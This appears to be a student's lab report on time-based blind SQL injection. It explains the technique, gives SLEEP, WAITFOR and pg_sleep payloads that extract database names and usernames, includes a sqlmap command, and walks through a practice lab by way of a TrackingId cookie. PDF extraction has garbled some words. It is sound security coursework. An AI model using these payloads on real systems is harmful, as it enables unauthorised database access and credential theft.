Lab 10: Blind SQL injection - Timebase SQL Injection

Objective:
- This lab is dedicated to exploring Time-Based SQL Injection, a subtype of SQL injection
attacks where the attacker can infer information from a database by observing the response
time of the web application. Participants will interact with a simulated web application that
has a time-based SQL injection vulnerability. The goal is to understand the mechanics of this
attack, identify vulnerabilities, exploit them, and learn effective mitigation strategies.

In this lab, students need to:

 Answer the following questions:
o What distinguishes Time-Based SQL Injection from other SQL injection techniques?
Explain how an attacker can use time delays in SQL queries to extract information from a
database, and why this method is particularly useful when dealing with blind SQL
injection scenarios where no data is returned in the web application's responses.

Time-Based SQL Injection is a type of blind SQL injection technique that relies on
deliberate time delays to infer information from a database. Unlike other SQL injection
methods that directly retrieve data (such as Union-Based SQL Injection), Time-Based
SQL Injection is particularly useful when the application does not return visible database
errors or output (hence, "blind" SQL injection).

How It Works:
1. Injecting a Time Delay:
The attacker crafts an SQL query that includes a conditional delay, typically using
database-specific functions such as:
MySQL: SLEEP(seconds)
Microsoft SQL Server: WAITFOR DELAY 'hh:mm:ss'
PostgreSQL: pg_sleep(seconds)
2. Observing Response Time:
 If the condition in the query is true, the database executes the delay, causing a
noticeable slowdown in the web application's response.
 If the condition is false, the response is returned immediately.
3. Extracting Data Bit by Bit:
 By crafting boolean conditions inside the SQL query, the attacker can systematically
test individual characters or bits of data.
 Example (MySQL-based injection):
SELECT IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(5), 0);
 If the first character of the database name is 'a', the response is delayed by 5
seconds.
 If not, the response is immediate.
 Repeating this process for each character allows the attacker to reconstruct the
entire database name.
Why Is This Useful in Blind SQL Injection
 No Direct Data Exposure: Many modern web applications suppress error messages
and prevent direct data retrieval via UNION queries.
 Bypassing Security Filters: Since no explicit data is returned, simple filters that block
error-based or union-based injections may not detect this method.
 Reliable Even in Restricted Environments: As long as the application’s response time
can be observed, this attack can be executed without needing visible database
errors.

o Describe the process of executing a Time-Based SQL Injection attack on a vulnerable

web application. What are the key steps in crafting a SQL query that causes a deliberate
delay in the database response.

1. Identifying a Vulnerable Input Field

Before launching a Time-Based SQL Injection, the attacker must find an input field that
interacts with the database. This could be:
 A login form ( & fields).usernamepassword
 A search box that queries the database.
 A URL parameter (e.g., ).example.com/product.php?id=5
The attacker tests if the input field is vulnerable by injecting a basic SQL query that
introduces a delay, such as:
' OR SLEEP(5) –
If the page takes 5 seconds longer to respond, it suggests that the database is executing
the injected SQL code.

2. Crafting a Deliberate Time Delay Query

Once confirmed, the attacker can craft more sophisticated queries to extract data bit by
bit. Different databases use different functions to introduce delays:
 MySQL:
' OR IF(1=1, SLEEP(5), 0) --
If is true, the database sleeps for 5 seconds before responding.1=1
If the page delays, the injection is working.
 Microsoft SQL Server:
' OR IF(1=1) WAITFOR DELAY '0:0:5' --
 PostgreSQL:
' OR SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END; --
3. Extracting Data Using Conditional Delays
To extract sensitive data (e.g., database name, usernames, or passwords), the attacker
systematically checks one character at a time:
 MySQL Example (Extracting First Letter of Database Name)
' OR IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(5), 0) --
If the first character of the database name is , the page will delay by 5 seconds.'a'
If not, the response will be instant.
The attacker repeats this for each letter, reconstructing the full database name.
 Example (Extracting First Letter of Database Name)
' OR IF(SUBSTRING((SELECT user FROM mysql.user LIMIT 1),1,1)='r', SLEEP(5), 0) –
If the first letter of the first username is , the page will delay.'r'
The attacker iterates through characters ( to , to ) until the correct username is fully
extracted.'a''z'09
4. Automating the Process

Manually testing each character is time-consuming, so attackers often use SQLMap, an

automated SQL Injection tool:
sqlmap -u "http://example.com/product.php?id=5" --dbms=mysql --time-sec=5 --
technique=T
--dbms=mysql: Specifies MySQL as the target database.
--time-sec=5: Uses a 5-second delay to determine true/false conditions.
--technique=T: Forces the use of time-based SQL injection.
5. Exploiting Extracted Data

Once an attacker extracts database names, table names, and credentials, they can:
 Dump user data (e.g., & columns).usernamepassword
 Gain privileged access to the system.
 Escalate the attack to remote code execution (RCE) in some cases.
 Perform challenge:
o Blind SQL injection with time delays
 Explain and capture all steps (full windows screen capture).

Blind SQL injection with time delays

Mở proxy bật intercept rồi đăng nhập vào bài lab

Thêm đoạn này vào sau cookie TrackingId “'||pg_sleep(10)—”

Forward và chờ 10 giây

Ta đã hoàn thành bài lab

Submit a report addressing all the questions mentioned above in either PDF or Markdown format.
Additionally, include a video demonstrating the detailed process of your work to ensure the
authenticity of your lab exercise.
The report file name must be Class_YourStudentID _YourName_Lab10